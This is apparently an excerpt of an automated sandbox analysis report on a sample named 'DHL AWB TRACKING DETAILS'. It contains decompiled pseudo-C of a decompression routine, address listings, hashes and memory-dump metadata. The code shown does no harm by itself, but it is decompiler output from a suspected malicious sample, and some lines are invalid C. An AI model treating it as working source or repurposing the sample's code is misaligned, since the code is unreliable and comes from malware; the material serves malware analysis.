                    							__eflags =  *(__ebp - 0x6c);
                    							if( *(__ebp - 0x6c) == 0) {
                    								 *(__ebp - 0x88) = 0x10;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x70);
                    							__eax =  *(__ebp - 0xc);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							_t365 = __ebp - 0x70;
                    							 *_t365 =  *(__ebp - 0x70) + 1;
                    							__eflags =  *_t365;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							goto L111;
                    						case 0x11:
                    							goto L69;
                    						case 0x12:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								__eax =  *(__ebp - 0x58);
                    								 *(__ebp - 0x84) = 0x13;
                    								__esi =  *(__ebp - 0x58) + 2;
                    								goto L132;
                    							}
                    							__eax =  *(__ebp - 0x4c);
                    							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                    							__ecx =  *(__ebp - 0x58);
                    							__eax =  *(__ebp - 0x4c) << 4;
                    							__eflags = __eax;
                    							__eax =  *(__ebp - 0x58) + __eax + 4;
                    							goto L130;
                    						case 0x13:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								_t469 = __ebp - 0x58;
                    								 *_t469 =  *(__ebp - 0x58) + 0x204;
                    								__eflags =  *_t469;
                    								 *(__ebp - 0x30) = 0x10;
                    								 *(__ebp - 0x40) = 8;
                    								L144:
                    								 *(__ebp - 0x7c) = 0x14;
                    								goto L145;
                    							}
                    							__eax =  *(__ebp - 0x4c);
                    							__ecx =  *(__ebp - 0x58);
                    							__eax =  *(__ebp - 0x4c) << 4;
                    							 *(__ebp - 0x30) = 8;
                    							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                    							L130:
                    							 *(__ebp - 0x58) = __eax;
                    							 *(__ebp - 0x40) = 3;
                    							goto L144;
                    						case 0x14:
                    							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                    							__eax =  *(__ebp - 0x80);
                    							goto L140;
                    						case 0x15:
                    							__eax = 0;
                    							__eflags =  *(__ebp - 0x38) - 7;
                    							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    							__al = __al & 0x000000fd;
                    							__eax = (__eflags >= 0) - 1 + 0xb;
                    							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                    							goto L120;
                    						case 0x16:
                    							__eax =  *(__ebp - 0x30);
                    							__eflags = __eax - 4;
                    							if(__eax >= 4) {
                    								_push(3);
                    								_pop(__eax);
                    							}
                    							__ecx =  *(__ebp - 4);
                    							 *(__ebp - 0x40) = 6;
                    							__eax = __eax << 7;
                    							 *(__ebp - 0x7c) = 0x19;
                    							 *(__ebp - 0x58) = __eax;
                    							goto L145;
                    						case 0x17:
                    							L145:
                    							__eax =  *(__ebp - 0x40);
                    							 *(__ebp - 0x50) = 1;
                    							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                    							goto L149;
                    						case 0x18:
                    							L146:
                    							__eflags =  *(__ebp - 0x6c);
                    							if( *(__ebp - 0x6c) == 0) {
                    								 *(__ebp - 0x88) = 0x18;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x70);
                    							__eax =  *(__ebp - 0xc);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							_t484 = __ebp - 0x70;
                    							 *_t484 =  *(__ebp - 0x70) + 1;
                    							__eflags =  *_t484;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							L148:
                    							_t487 = __ebp - 0x48;
                    							 *_t487 =  *(__ebp - 0x48) - 1;
                    							__eflags =  *_t487;
                    							L149:
                    							__eflags =  *(__ebp - 0x48);
                    							if( *(__ebp - 0x48) <= 0) {
                    								__ecx =  *(__ebp - 0x40);
                    								__ebx =  *(__ebp - 0x50);
                    								0 = 1;
                    								__eax = 1 << __cl;
                    								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                    								__eax =  *(__ebp - 0x7c);
                    								 *(__ebp - 0x44) = __ebx;
                    								goto L140;
                    							}
                    							__eax =  *(__ebp - 0x50);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    							__eax =  *(__ebp - 0x58);
                    							__esi = __edx + __eax;
                    							 *(__ebp - 0x54) = __esi;
                    							__ax =  *__esi;
                    							__edi = __ax & 0x0000ffff;
                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    							__eflags =  *(__ebp - 0xc) - __ecx;
                    							if( *(__ebp - 0xc) >= __ecx) {
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    								__cx = __ax;
                    								__cx = __ax >> 5;
                    								__eax = __eax - __ecx;
                    								__edx = __edx + 1;
                    								__eflags = __edx;
                    								 *__esi = __ax;
                    								 *(__ebp - 0x50) = __edx;
                    							} else {
                    								 *(__ebp - 0x10) = __ecx;
                    								0x800 = 0x800 - __edi;
                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    								 *__esi = __cx;
                    							}
                    							__eflags =  *(__ebp - 0x10) - 0x1000000;
                    							if( *(__ebp - 0x10) >= 0x1000000) {
                    								goto L148;
                    							} else {
                    								goto L146;
                    							}
                    						case 0x19:
                    							__eflags = __ebx - 4;
                    							if(__ebx < 4) {
                    								 *(__ebp - 0x2c) = __ebx;
                    								L119:
                    								_t393 = __ebp - 0x2c;
                    								 *_t393 =  *(__ebp - 0x2c) + 1;
                    								__eflags =  *_t393;
                    								L120:
                    								__eax =  *(__ebp - 0x2c);
                    								__eflags = __eax;
                    								if(__eax == 0) {
                    									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                    									goto L170;
                    								}
                    								__eflags = __eax -  *(__ebp - 0x60);
                    								if(__eax >  *(__ebp - 0x60)) {
                    									goto L171;
                    								}
                    								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                    								__eax =  *(__ebp - 0x30);
                    								_t400 = __ebp - 0x60;
                    								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                    								__eflags =  *_t400;
                    								goto L123;
                    							}
                    							__ecx = __ebx;
                    							__eax = __ebx;
                    							__ecx = __ebx >> 1;
                    							__eax = __ebx & 0x00000001;
                    							__ecx = (__ebx >> 1) - 1;
                    							__al = __al | 0x00000002;
                    							__eax = (__ebx & 0x00000001) << __cl;
                    							__eflags = __ebx - 0xe;
                    							 *(__ebp - 0x2c) = __eax;
                    							if(__ebx >= 0xe) {
                    								__ebx = 0;
                    								 *(__ebp - 0x48) = __ecx;
                    								L102:
                    								__eflags =  *(__ebp - 0x48);
                    								if( *(__ebp - 0x48) <= 0) {
                    									__eax = __eax + __ebx;
                    									 *(__ebp - 0x40) = 4;
                    									 *(__ebp - 0x2c) = __eax;
                    									__eax =  *(__ebp - 4);
                    									__eax =  *(__ebp - 4) + 0x644;
                    									__eflags = __eax;
                    									L108:
                    									__ebx = 0;
                    									 *(__ebp - 0x58) = __eax;
                    									 *(__ebp - 0x50) = 1;
                    									 *(__ebp - 0x44) = 0;
                    									 *(__ebp - 0x48) = 0;
                    									L112:
                    									__eax =  *(__ebp - 0x40);
                    									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                    										_t391 = __ebp - 0x2c;
                    										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                    										__eflags =  *_t391;
                    										goto L119;
                    									}
                    									__eax =  *(__ebp - 0x50);
                    									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    									__eax =  *(__ebp - 0x58);
                    									__esi = __edi + __eax;
                    									 *(__ebp - 0x54) = __esi;
                    									__ax =  *__esi;
                    									__ecx = __ax & 0x0000ffff;
                    									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                    									__eflags =  *(__ebp - 0xc) - __edx;
                    									if( *(__ebp - 0xc) >= __edx) {
                    										__ecx = 0;
                    										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                    										__ecx = 1;
                    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                    										__ebx = 1;
                    										__ecx =  *(__ebp - 0x48);
                    										__ebx = 1 << __cl;
                    										__ecx = 1 << __cl;
                    										__ebx =  *(__ebp - 0x44);
                    										__ebx =  *(__ebp - 0x44) | __ecx;
                    										__cx = __ax;
                    										__cx = __ax >> 5;
                    										__eax = __eax - __ecx;
                    										__edi = __edi + 1;
                    										__eflags = __edi;
                    										 *(__ebp - 0x44) = __ebx;
                    										 *__esi = __ax;
                    										 *(__ebp - 0x50) = __edi;
                    									} else {
                    										 *(__ebp - 0x10) = __edx;
                    										0x800 = 0x800 - __ecx;
                    										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                    										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    										 *__esi = __dx;
                    									}
                    									__eflags =  *(__ebp - 0x10) - 0x1000000;
                    									if( *(__ebp - 0x10) >= 0x1000000) {
                    										L111:
                    										_t368 = __ebp - 0x48;
                    										 *_t368 =  *(__ebp - 0x48) + 1;
                    										__eflags =  *_t368;
                    										goto L112;
                    									} else {
                    										goto L109;
                    									}
                    								}
                    								__ecx =  *(__ebp - 0xc);
                    								__ebx = __ebx + __ebx;
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                    								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    								 *(__ebp - 0x44) = __ebx;
                    								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                    									__ecx =  *(__ebp - 0x10);
                    									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    									__ebx = __ebx | 0x00000001;
                    									__eflags = __ebx;
                    									 *(__ebp - 0x44) = __ebx;
                    								}
                    								__eflags =  *(__ebp - 0x10) - 0x1000000;
                    								if( *(__ebp - 0x10) >= 0x1000000) {
                    									L101:
                    									_t338 = __ebp - 0x48;
                    									 *_t338 =  *(__ebp - 0x48) - 1;
                    									__eflags =  *_t338;
                    									goto L102;
                    								} else {
                    									goto L99;
                    								}
                    							}
                    							__edx =  *(__ebp - 4);
                    							__eax = __eax - __ebx;
                    							 *(__ebp - 0x40) = __ecx;
                    							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                    							goto L108;
                    						case 0x1a:
                    							L56:
                    							__eflags =  *(__ebp - 0x64);
                    							if( *(__ebp - 0x64) == 0) {
                    								 *(__ebp - 0x88) = 0x1a;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x68);
                    							__al =  *(__ebp - 0x5c);
                    							__edx =  *(__ebp - 8);
                    							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    							 *( *(__ebp - 0x68)) = __al;
                    							__ecx =  *(__ebp - 0x14);
                    							 *(__ecx +  *(__ebp - 8)) = __al;
                    							__eax = __ecx + 1;
                    							__edx = 0;
                    							_t192 = __eax %  *(__ebp - 0x74);
                    							__eax = __eax /  *(__ebp - 0x74);
                    							__edx = _t192;
                    							goto L79;
                    						case 0x1b:
                    							goto L75;
                    						case 0x1c:
                    							while(1) {
                    								L123:
                    								__eflags =  *(__ebp - 0x64);
                    								if( *(__ebp - 0x64) == 0) {
                    									break;
                    								}
                    								__eax =  *(__ebp - 0x14);
                    								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    								__eflags = __eax -  *(__ebp - 0x74);
                    								if(__eax >=  *(__ebp - 0x74)) {
                    									__eax = __eax +  *(__ebp - 0x74);
                    									__eflags = __eax;
                    								}
                    								__edx =  *(__ebp - 8);
                    								__cl =  *(__eax + __edx);
                    								__eax =  *(__ebp - 0x14);
                    								 *(__ebp - 0x5c) = __cl;
                    								 *(__eax + __edx) = __cl;
                    								__eax = __eax + 1;
                    								__edx = 0;
                    								_t414 = __eax %  *(__ebp - 0x74);
                    								__eax = __eax /  *(__ebp - 0x74);
                    								__edx = _t414;
                    								__eax =  *(__ebp - 0x68);
                    								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                    								__eflags =  *(__ebp - 0x30);
                    								 *( *(__ebp - 0x68)) = __cl;
                    								 *(__ebp - 0x14) = _t414;
                    								if( *(__ebp - 0x30) > 0) {
                    									continue;
                    								} else {
                    									goto L80;
                    								}
                    							}
                    							 *(__ebp - 0x88) = 0x1c;
                    							goto L170;
                    					}
                    				}
                    			}













                    0x0040669c
                    0x00000000
                    0x00000000
                    0x00406830
                    0x00406833
                    0x00000000
                    0x00000000
                    0x0040646a
                    0x0040646c
                    0x00406473
                    0x00406474
                    0x00406476
                    0x00406479
                    0x00000000
                    0x00000000
                    0x00406481
                    0x00406484
                    0x00406487
                    0x00406489
                    0x0040648b
                    0x0040648b
                    0x0040648c
                    0x0040648f
                    0x00406496
                    0x00406499
                    0x004064a7
                    0x00000000
                    0x00000000
                    0x0040677d
                    0x0040677d
                    0x00406780
                    0x00406787
                    0x00000000
                    0x00000000
                    0x0040678c
                    0x0040678c
                    0x00406790
                    0x004068c8
                    0x00000000
                    0x004068c8
                    0x00406796
                    0x00406799
                    0x0040679c
                    0x004067a0
                    0x004067a3
                    0x004067a9
                    0x004067ab
                    0x004067ab
                    0x004067ab
                    0x004067ae
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b4
                    0x004067b4
                    0x004067b8
                    0x00406818
                    0x0040681b
                    0x00406820
                    0x00406821
                    0x00406823
                    0x00406825
                    0x00406828
                    0x00000000
                    0x00406828
                    0x004067ba
                    0x004067c0
                    0x004067c3
                    0x004067c6
                    0x004067c9
                    0x004067cc
                    0x004067cf
                    0x004067d2
                    0x004067d5
                    0x004067d8
                    0x004067db
                    0x004067f4
                    0x004067f7
                    0x004067fa
                    0x004067fd
                    0x00406801
                    0x00406803
                    0x00406803
                    0x00406804
                    0x00406807
                    0x004067dd
                    0x004067dd
                    0x004067e5
                    0x004067ea
                    0x004067ec
                    0x004067ef
                    0x004067ef
                    0x0040680a
                    0x00406811
                    0x00000000
                    0x00406813
                    0x00000000
                    0x00406813
                    0x00000000
                    0x004064af
                    0x004064b2
                    0x004064e8
                    0x00406618
                    0x00406618
                    0x00406618
                    0x00406618
                    0x0040661b
                    0x0040661b
                    0x0040661e
                    0x00406620
                    0x004068aa
                    0x00000000
                    0x004068aa
                    0x00406626
                    0x00406629
                    0x00000000
                    0x00000000
                    0x0040662f
                    0x00406633
                    0x00406636
                    0x00406636
                    0x00406636
                    0x00000000
                    0x00406636
                    0x004064b4
                    0x004064b6
                    0x004064b8
                    0x004064ba
                    0x004064bd
                    0x004064be
                    0x004064c0
                    0x004064c2
                    0x004064c5
                    0x004064c8
                    0x004064de
                    0x004064e3
                    0x0040651b
                    0x0040651b
                    0x0040651f
                    0x0040654b
                    0x0040654d
                    0x00406554
                    0x00406557
                    0x0040655a
                    0x0040655a
                    0x0040655f
                    0x0040655f
                    0x00406561
                    0x00406564
                    0x0040656b
                    0x0040656e
                    0x0040659b
                    0x0040659b
                    0x0040659e
                    0x004065a1
                    0x00406615
                    0x00406615
                    0x00406615
                    0x00000000
                    0x00406615
                    0x004065a3
                    0x004065a9
                    0x004065ac
                    0x004065af
                    0x004065b2
                    0x004065b5
                    0x004065b8
                    0x004065bb
                    0x004065be
                    0x004065c1
                    0x004065c4
                    0x004065dd
                    0x004065df
                    0x004065e2
                    0x004065e3
                    0x004065e6
                    0x004065e8
                    0x004065eb
                    0x004065ed
                    0x004065ef
                    0x004065f2
                    0x004065f4
                    0x004065f7
                    0x004065fb
                    0x004065fd
                    0x004065fd
                    0x004065fe
                    0x00406601
                    0x00406604
                    0x004065c6
                    0x004065c6
                    0x004065ce
                    0x004065d3
                    0x004065d5
                    0x004065d8
                    0x004065d8
                    0x00406607
                    0x0040660e
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00000000
                    0x00406610
                    0x00000000
                    0x00406610
                    0x0040660e
                    0x00406521
                    0x00406524
                    0x00406526
                    0x00406529
                    0x0040652c
                    0x0040652f
                    0x00406531
                    0x00406534
                    0x00406537
                    0x00406537
                    0x0040653a
                    0x0040653a
                    0x0040653d
                    0x00406544
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00000000
                    0x00406546
                    0x00000000
                    0x00406546
                    0x00406544
                    0x004064ca
                    0x004064cd
                    0x004064cf
                    0x004064d2
                    0x00000000
                    0x00000000
                    0x00406231
                    0x00406231
                    0x00406235
                    0x0040687a
                    0x00000000
                    0x0040687a
                    0x0040623b
                    0x0040623e
                    0x00406241
                    0x00406244
                    0x00406247
                    0x0040624a
                    0x0040624d
                    0x0040624f
                    0x00406252
                    0x00406255
                    0x00406258
                    0x0040625a
                    0x0040625a
                    0x0040625a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406639
                    0x00406639
                    0x00406639
                    0x0040663d
                    0x00000000
                    0x00000000
                    0x00406643
                    0x00406646
                    0x00406649
                    0x0040664c
                    0x0040664e
                    0x0040664e
                    0x0040664e
                    0x00406651
                    0x00406654
                    0x00406657
                    0x0040665a
                    0x0040665d
                    0x00406660
                    0x00406661
                    0x00406663
                    0x00406663
                    0x00406663
                    0x00406666
                    0x00406669
                    0x0040666c
                    0x0040666f
                    0x00406672
                    0x00406676
                    0x00406678
                    0x0040667b
                    0x00000000
                    0x0040667d
                    0x00000000
                    0x0040667d
                    0x0040667b
                    0x004068b0
                    0x00000000
                    0x00000000
                    0x00405edf

                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                    • Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
                    • Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                    • Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E00405E9D(void* __ecx) {
                    				void* _v8;
                    				void* _v12;
                    				signed int _v16;
                    				unsigned int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int _v48;
                    				signed int _v52;
                    				signed int _v56;
                    				signed int _v60;
                    				signed int _v64;
                    				signed int _v68;
                    				signed int _v72;
                    				signed int _v76;
                    				signed int _v80;
                    				signed int _v84;
                    				signed int _v88;
                    				signed int _v92;
                    				signed int _v95;
                    				signed int _v96;
                    				signed int _v100;
                    				signed int _v104;
                    				signed int _v108;
                    				signed int _v112;
                    				signed int _v116;
                    				signed int _v120;
                    				intOrPtr _v124;
                    				signed int _v128;
                    				signed int _v132;
                    				signed int _v136;
                    				void _v140;
                    				void* _v148;
                    				signed int _t537;
                    				signed int _t538;
                    				signed int _t572;
                    
                    				_t572 = 0x22;
                    				_v148 = __ecx;
                    				memcpy( &_v140, __ecx, _t572 << 2);
                    				if(_v52 == 0xffffffff) {
                    					return 1;
                    				}
                    				while(1) {
                    					L3:
                    					_t537 = _v140;
                    					if(_t537 > 0x1c) {
                    						break;
                    					}
                    					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
                    						case 0:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								goto L173;
                    							}
                    							_v112 = _v112 - 1;
                    							_v116 = _v116 + 1;
                    							_t537 =  *_v116;
                    							__eflags = _t537 - 0xe1;
                    							if(_t537 > 0xe1) {
                    								goto L174;
                    							}
                    							_t542 = _t537 & 0x000000ff;
                    							_push(0x2d);
                    							asm("cdq");
                    							_pop(_t576);
                    							_push(9);
                    							_pop(_t577);
                    							_t622 = _t542 / _t576;
                    							_t544 = _t542 % _t576 & 0x000000ff;
                    							asm("cdq");
                    							_t617 = _t544 % _t577 & 0x000000ff;
                    							_v64 = _t617;
                    							_v32 = (1 << _t622) - 1;
                    							_v28 = (1 << _t544 / _t577) - 1;
                    							_t625 = (0x300 << _t617 + _t622) + 0x736;
                    							__eflags = 0x600 - _v124;
                    							if(0x600 == _v124) {
                    								L12:
                    								__eflags = _t625;
                    								if(_t625 == 0) {
                    									L14:
                    									_v76 = _v76 & 0x00000000;
                    									_v68 = _v68 & 0x00000000;
                    									goto L17;
                    								} else {
                    									goto L13;
                    								}
                    								do {
                    									L13:
                    									_t625 = _t625 - 1;
                    									__eflags = _t625;
                    									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                    								} while (_t625 != 0);
                    								goto L14;
                    							}
                    							__eflags = _v8;
                    							if(_v8 != 0) {
                    								GlobalFree(_v8);
                    							}
                    							_t537 = GlobalAlloc(0x40, 0x600); // executed
                    							__eflags = _t537;
                    							_v8 = _t537;
                    							if(_t537 == 0) {
                    								goto L174;
                    							} else {
                    								_v124 = 0x600;
                    								goto L12;
                    							}
                    						case 1:
                    							L15:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								_v140 = 1;
                    								goto L173;
                    							}
                    							_v112 = _v112 - 1;
                    							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                    							_v116 = _v116 + 1;
                    							_t50 =  &_v76;
                    							 *_t50 = _v76 + 1;
                    							__eflags =  *_t50;
                    							L17:
                    							__eflags = _v76 - 4;
                    							if(_v76 < 4) {
                    								goto L15;
                    							}
                    							_t550 = _v68;
                    							__eflags = _t550 - _v120;
                    							if(_t550 == _v120) {
                    								L22:
                    								_v76 = 5;
                    								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                    								goto L25;
                    							}
                    							__eflags = _v12;
                    							_v120 = _t550;
                    							if(_v12 != 0) {
                    								GlobalFree(_v12);
                    							}
                    							_t537 = GlobalAlloc(0x40, _v68); // executed
                    							__eflags = _t537;
                    							_v12 = _t537;
                    							if(_t537 == 0) {
                    								goto L174;
                    							} else {
                    								goto L22;
                    							}
                    						case 2:
                    							L26:
                    							_t557 = _v100 & _v32;
                    							_v136 = 6;
                    							_v80 = _t557;
                    							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                    							goto L135;
                    						case 3:
                    							L23:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								_v140 = 3;
                    								goto L173;
                    							}
                    							_v112 = _v112 - 1;
                    							_t72 =  &_v116;
                    							 *_t72 = _v116 + 1;
                    							__eflags =  *_t72;
                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							L25:
                    							_v76 = _v76 - 1;
                    							__eflags = _v76;
                    							if(_v76 != 0) {
                    								goto L23;
                    							}
                    							goto L26;
                    						case 4:
                    							L136:
                    							_t559 =  *_t626;
                    							_t610 = _t559 & 0x0000ffff;
                    							_t591 = (_v20 >> 0xb) * _t610;
                    							__eflags = _v16 - _t591;
                    							if(_v16 >= _t591) {
                    								_v20 = _v20 - _t591;
                    								_v16 = _v16 - _t591;
                    								_v68 = 1;
                    								_t560 = _t559 - (_t559 >> 5);
                    								__eflags = _t560;
                    								 *_t626 = _t560;
                    							} else {
                    								_v20 = _t591;
                    								_v68 = _v68 & 0x00000000;
                    								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                    							}
                    							__eflags = _v20 - 0x1000000;
                    							if(_v20 >= 0x1000000) {
                    								goto L142;
                    							} else {
                    								goto L140;
                    							}
                    						case 5:
                    							L140:
                    							__eflags = _v112;
                    							if(_v112 == 0) {
                    								_v140 = 5;
                    								goto L173;
                    							}
                    							_v20 = _v20 << 8;
                    							_v112 = _v112 - 1;
                    							_t464 =  &_v116;
                    							 *_t464 = _v116 + 1;
                    							__eflags =  *_t464;
                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							L142:
                    							_t561 = _v136;
                    							goto L143;
                    						case 6:
                    							__edx = 0;
                    							__eflags = _v68;
                    							if(_v68 != 0) {
                    								__eax = _v8;
                    								__ecx = _v60;
                    								_v56 = 1;
                    								_v136 = 7;
                    								__esi = _v8 + 0x180 + _v60 * 2;
                    								goto L135;
                    							}
                    							__eax = _v96 & 0x000000ff;
                    							__esi = _v100;
                    							__cl = 8;
                    							__cl = 8 - _v64;
                    							__esi = _v100 & _v28;
                    							__eax = (_v96 & 0x000000ff) >> 8;
                    							__ecx = _v64;
                    							__esi = (_v100 & _v28) << 8;
                    							__ecx = _v8;
                    							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                    							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                    							__eflags = _v60 - 4;
                    							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                    							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                    							if(_v60 >= 4) {
                    								__eflags = _v60 - 0xa;
                    								if(_v60 >= 0xa) {
                    									_t103 =  &_v60;
                    									 *_t103 = _v60 - 6;
                    									__eflags =  *_t103;
                    								} else {
                    									_v60 = _v60 - 3;
                    								}
                    							} else {
                    								_v60 = 0;
                    							}
                    							__eflags = _v56 - __edx;
                    							if(_v56 == __edx) {
                    								__ebx = 0;
                    								__ebx = 1;
                    								goto L63;
                    							}
                    							__eax = _v24;
                    							__eax = _v24 - _v48;
                    							__eflags = __eax - _v120;
                    							if(__eax >= _v120) {
                    								__eax = __eax + _v120;
                    								__eflags = __eax;
                    							}
                    							__ecx = _v12;
                    							__ebx = 0;
                    							__ebx = 1;
                    							__al =  *((intOrPtr*)(__eax + __ecx));
                    							_v95 =  *((intOrPtr*)(__eax + __ecx));
                    							goto L43;
                    						case 7:
                    							__eflags = _v68 - 1;
                    							if(_v68 != 1) {
                    								__eax = _v40;
                    								_v132 = 0x16;
                    								_v36 = _v40;
                    								__eax = _v44;
                    								_v40 = _v44;
                    								__eax = _v48;
                    								_v44 = _v48;
                    								__eax = 0;
                    								__eflags = _v60 - 7;
                    								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    								__al = __al & 0x000000fd;
                    								__eax = (__eflags >= 0) - 1 + 0xa;
                    								_v60 = (__eflags >= 0) - 1 + 0xa;
                    								__eax = _v8;
                    								__eax = _v8 + 0x664;
                    								__eflags = __eax;
                    								_v92 = __eax;
                    								goto L71;
                    							}
                    							__eax = _v8;
                    							__ecx = _v60;
                    							_v136 = 8;
                    							__esi = _v8 + 0x198 + _v60 * 2;
                    							goto L135;
                    						case 8:
                    							__eflags = _v68;
                    							if(_v68 != 0) {
                    								__eax = _v8;
                    								__ecx = _v60;
                    								_v136 = 0xa;
                    								__esi = _v8 + 0x1b0 + _v60 * 2;
                    							} else {
                    								__eax = _v60;
                    								__ecx = _v8;
                    								__eax = _v60 + 0xf;
                    								_v136 = 9;
                    								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                    								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                    							}
                    							goto L135;
                    						case 9:
                    							__eflags = _v68;
                    							if(_v68 != 0) {
